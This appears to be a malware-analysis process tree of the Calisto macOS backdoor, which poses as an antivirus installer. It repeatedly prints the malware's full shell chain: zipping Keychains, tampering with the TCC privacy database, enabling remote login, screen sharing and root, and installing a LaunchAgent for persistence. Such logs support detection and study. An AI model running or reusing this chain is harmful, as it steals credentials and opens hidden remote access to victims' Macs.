Calisto Process Tree
{
"process_name": false,
"pid": 2532,
"command_line_args": false,
"child_processes": [
{
"process_name": "/bin/bash",
"pid": 2540,
"command_line_args": "/bin/bash -c mkdir ~/.calisto/"
},
{
"process_name": "/bin/bash",
"pid": 2540,
"command_line_args": "/bin/bash -c mkdir ~/.calisto/"
},
{
"process_name": "/bin/bash",
"pid": 2541,
"command_line_args": "/bin/bash -c echo abc123 | sudo -S zip -r ~/.calisto/KC.zip ~/Library/Keychains/ /Library/Keychains/ && ifconfig > ~/.calisto/network.dat && echo zingo123abc123 > ~/.calisto/cred.dat && zip -r ~/.calisto/calisto.zip ~/.calisto/ && sudo /usr/bin/sqlite3 /Library/Application\\ Support/com.apple.TCC/TCC.db \"INSERT or REPLACE INTO access VALUES('kTCCServiceAccessibility','com.intego.Mac-Internet-Security-X9-Installer',0,1,1,NULL,NULL);\" && sudo systemsetup -setremotelogin on && sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -access -off -restart -agent -privs -all -allowAccessFor -allUsers && dsenableroot -p abc123 -r aGNOStIC7890!!! && sudo systemsetup -setcomputersleep Never && sudo cp -R /Volumes/Mac\\ Internet\\ Security\\ X9/Mac\\ Internet\\ Security\\ X9\\ Installer.app /System/Library/CoreServices/launchb.app && sudo mv /System/Library/CoreServices/launchb.app/Contents/MacOS/Mac\\ Internet\\ Security\\ X9\\ Installer /System/Library/CoreServices/launchb.app/Contents/MacOS/launchb && sudo cp -f /System/Library/CoreServices/launchb.app/Contents/Resources/InfoL.plist /System/Library/CoreServices/launchb.app/Contents/Info.plist && sudo cp -f /System/Library/CoreServices/launchb.app/Contents/Resources/com.intego.Mac-Internet-Security-X9-Installer.plist /Library/LaunchAgents/com.intego.Mac-Internet-Security-X9-Installer.plist && echo Success",
"child_processes": [
{
"process_name": "/usr/bin/sudo",
"pid": 2543,
"command_line_args": "sudo -S zip -r /Users/zingo123/.calisto/KC.zip /Users/zingo123/Library/Keychains/ /Library/Keychains/",
"child_processes": [
{
"process_name": "/usr/bin/zip",
"pid": 2544,
"command_line_args": "zip -r /Users/zingo123/.calisto/KC.zip /Users/zingo123/Library/Keychains/ /Library/Keychains/"
}
]
},
{
"process_name": "/sbin/ifconfig",
"pid": 2545,
"command_line_args": "ifconfig"
},
{
"process_name": "/usr/bin/zip",
"pid": 2546,
"command_line_args": "zip -r /Users/zingo123/.calisto/calisto.zip /Users/zingo123/.calisto/"
},
{
"process_name": "/usr/bin/sudo",
"pid": 2547,
"command_line_args": "sudo /usr/bin/sqlite3 /Library/Application Support/com.apple.TCC/TCC.db INSERT or REPLACE INTO access VALUES('kTCCServiceAccessibility','com.intego.Mac-Internet-Security-X9-Installer',0,1,1,NULL,NULL);",
"child_processes": [
{
"process_name": "/usr/bin/sqlite3",
"pid": 2548,
"command_line_args": "/usr/bin/sqlite3 /Library/Application Support/com.apple.TCC/TCC.db INSERT or REPLACE INTO access VALUES('kTCCServiceAccessibility','com.intego.Mac-Internet-Security-X9-Installer',0,1,1,NULL,NULL);"
}
]
}
]
},
{
"process_name": "/bin/bash",
"pid": 2549,
"command_line_args": "/bin/bash -c mkdir ~/.calisto/"
},
{
"process_name": "/bin/bash",
"pid": 2549,
"command_line_args": "/bin/bash -c mkdir ~/.calisto/"
},
{
"process_name": "/bin/bash",
"pid": 2550,
"command_line_args": "/bin/bash -c echo abc123 | sudo -S zip -r ~/.calisto/KC.zip ~/Library/Keychains/ /Library/Keychains/ && ifconfig > ~/.calisto/network.dat && echo zingo123abc123 > ~/.calisto/cred.dat && zip -r ~/.calisto/calisto.zip ~/.calisto/ && sudo /usr/bin/sqlite3 /Library/Application\\ Support/com.apple.TCC/TCC.db \"INSERT or REPLACE INTO access VALUES('kTCCServiceAccessibility','com.intego.Mac-Internet-Security-X9-Installer',0,1,1,NULL,NULL);\" && sudo systemsetup -setremotelogin on && sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -access -off -restart -agent -privs -all -allowAccessFor -allUsers && dsenableroot -p abc123 -r aGNOStIC7890!!! && sudo systemsetup -setcomputersleep Never && sudo cp -R /Volumes/Mac\\ Internet\\ Security\\ X9/Mac\\ Internet\\ Security\\ X9\\ Installer.app /System/Library/CoreServices/launchb.app && sudo mv /System/Library/CoreServices/launchb.app/Contents/MacOS/Mac\\ Internet\\ Security\\ X9\\ Installer /System/Library/CoreServices/launchb.app/Contents/MacOS/launchb && sudo cp -f /System/Library/CoreServices/launchb.app/Contents/Resources/InfoL.plist /System/Library/CoreServices/launchb.app/Contents/Info.plist && sudo cp -f /System/Library/CoreServices/launchb.app/Contents/Resources/com.intego.Mac-Internet-Security-X9-Installer.plist /Library/LaunchAgents/com.intego.Mac-Internet-Security-X9-Installer.plist && echo Success",
"child_processes": [
{
"process_name": "/usr/bin/sudo",
"pid": 2552,
"command_line_args": "sudo -S zip -r /Users/zingo123/.calisto/KC.zip /Users/zingo123/Library/Keychains/ /Library/Keychains/",
"child_processes": [
{
"process_name": "/usr/bin/zip",
"pid": 2553,
"command_line_args": "zip -r /Users/zingo123/.calisto/KC.zip /Users/zingo123/Library/Keychains/ /Library/Keychains/"
}
]
},
{
"process_name": "/sbin/ifconfig",
"pid": 2554,
"command_line_args": "ifconfig"
},
{
"process_name": "/usr/bin/zip",
"pid": 2555,
"command_line_args": "zip -r /Users/zingo123/.calisto/calisto.zip /Users/zingo123/.calisto/"
},
{
"process_name": "/usr/bin/sudo",
"pid": 2556,
"command_line_args": "sudo /usr/bin/sqlite3 /Library/Application Support/com.apple.TCC/TCC.db INSERT or REPLACE INTO access VALUES('kTCCServiceAccessibility','com.intego.Mac-Internet-Security-X9-Installer',0,1,1,NULL,NULL);",
"child_processes": [
{
"process_name": "/usr/bin/sqlite3",
"pid": 2557,
"command_line_args": "/usr/bin/sqlite3 /Library/Application Support/com.apple.TCC/TCC.db INSERT or REPLACE INTO access VALUES('kTCCServiceAccessibility','com.intego.Mac-Internet-Security-X9-Installer',0,1,1,NULL,NULL);"
}
]
}
]
},
{
"process_name": "/bin/bash",
"pid": 2558,
"command_line_args": "/bin/bash -c mkdir ~/.calisto/"
},
{
"process_name": "/bin/bash",
"pid": 2558,
"command_line_args": "/bin/bash -c mkdir ~/.calisto/"
},
{
"process_name": "/bin/bash",
"pid": 2559,
"command_line_args": "/bin/bash -c echo abc123 | sudo -S zip -r ~/.calisto/KC.zip ~/Library/Keychains/ /Library/Keychains/ && ifconfig > ~/.calisto/network.dat && echo zingo123abc123 > ~/.calisto/cred.dat && zip -r ~/.calisto/calisto.zip ~/.calisto/ && sudo /usr/bin/sqlite3 /Library/Application\\ Support/com.apple.TCC/TCC.db \"INSERT or REPLACE INTO access VALUES('kTCCServiceAccessibility','com.intego.Mac-Internet-Security-X9-Installer',0,1,1,NULL,NULL);\" && sudo systemsetup -setremotelogin on && sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -access -off -restart -agent -privs -all -allowAccessFor -allUsers && dsenableroot -p abc123 -r aGNOStIC7890!!! && sudo systemsetup -setcomputersleep Never && sudo cp -R /Volumes/Mac\\ Internet\\ Security\\ X9/Mac\\ Internet\\ Security\\ X9\\ Installer.app /System/Library/CoreServices/launchb.app && sudo mv /System/Library/CoreServices/launchb.app/Contents/MacOS/Mac\\ Internet\\ Security\\ X9\\ Installer /System/Library/CoreServices/launchb.app/Contents/MacOS/launchb && sudo cp -f /System/Library/CoreServices/launchb.app/Contents/Resources/InfoL.plist /System/Library/CoreServices/launchb.app/Contents/Info.plist && sudo cp -f /System/Library/CoreServices/launchb.app/Contents/Resources/com.intego.Mac-Internet-Security-X9-Installer.plist /Library/LaunchAgents/com.intego.Mac-Internet-Security-X9-Installer.plist && echo Success",
"child_processes": [
{
"process_name": "/usr/bin/sudo",
"pid": 2561,
"command_line_args": "sudo -S zip -r /Users/zingo123/.calisto/KC.zip /Users/zingo123/Library/Keychains/ /Library/Keychains/",
"child_processes": [
{
"process_name": "/usr/bin/zip",
"pid": 2562,
"command_line_args": "zip -r /Users/zingo123/.calisto/KC.zip /Users/zingo123/Library/Keychains/ /Library/Keychains/"
}
]
},
{
"process_name": "/sbin/ifconfig",
"pid": 2563,
"command_line_args": "ifconfig"
},
{
"process_name": "/usr/bin/zip",
"pid": 2564,
"command_line_args": "zip -r /Users/zingo123/.calisto/calisto.zip /Users/zingo123/.calisto/"
},
{
"process_name": "/usr/bin/sudo",
"pid": 2565,
"command_line_args": "sudo /usr/bin/sqlite3 /Library/Application Support/com.apple.TCC/TCC.db INSERT or REPLACE INTO access VALUES('kTCCServiceAccessibility','com.intego.Mac-Internet-Security-X9-Installer',0,1,1,NULL,NULL);",
"child_processes": [
{
"process_name": "/usr/bin/sqlite3",
"pid": 2566,
"command_line_args": "/usr/bin/sqlite3 /Library/Application Support/com.apple.TCC/TCC.db INSERT or REPLACE INTO access VALUES('kTCCServiceAccessibility','com.intego.Mac-Internet-Security-X9-Installer',0,1,1,NULL,NULL);"
}
]
}
]
},
{
"process_name": "/bin/bash",
"pid": 2567,
"command_line_args": "/bin/bash -c mkdir ~/.calisto/"
},
{
"process_name": "/bin/bash",
"pid": 2567,
"command_line_args": "/bin/bash -c mkdir ~/.calisto/"
},
{
"process_name": "/bin/bash",
"pid": 2568,
"command_line_args": "/bin/bash -c echo abc123 | sudo -S zip -r ~/.calisto/KC.zip ~/Library/Keychains/ /Library/Keychains/ && ifconfig > ~/.calisto/network.dat && echo zingo123abc123 > ~/.calisto/cred.dat && zip -r ~/.calisto/calisto.zip ~/.calisto/ && sudo /usr/bin/sqlite3 /Library/Application\\ Support/com.apple.TCC/TCC.db \"INSERT or REPLACE INTO access VALUES('kTCCServiceAccessibility','com.intego.Mac-Internet-Security-X9-Installer',0,1,1,NULL,NULL);\" && sudo systemsetup -setremotelogin on && sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -access -off -restart -agent -privs -all -allowAccessFor -allUsers && dsenableroot -p abc123 -r aGNOStIC7890!!! && sudo systemsetup -setcomputersleep Never && sudo cp -R /Volumes/Mac\\ Internet\\ Security\\ X9/Mac\\ Internet\\ Security\\ X9\\ Installer.app /System/Library/CoreServices/launchb.app && sudo mv /System/Library/CoreServices/launchb.app/Contents/MacOS/Mac\\ Internet\\ Security\\ X9\\ Installer /System/Library/CoreServices/launchb.app/Contents/MacOS/launchb && sudo cp -f /System/Library/CoreServices/launchb.app/Contents/Resources/InfoL.plist /System/Library/CoreServices/launchb.app/Contents/Info.plist && sudo cp -f /System/Library/CoreServices/launchb.app/Contents/Resources/com.intego.Mac-Internet-Security-X9-Installer.plist /Library/LaunchAgents/com.intego.Mac-Internet-Security-X9-Installer.plist && echo Success"
}
]
}
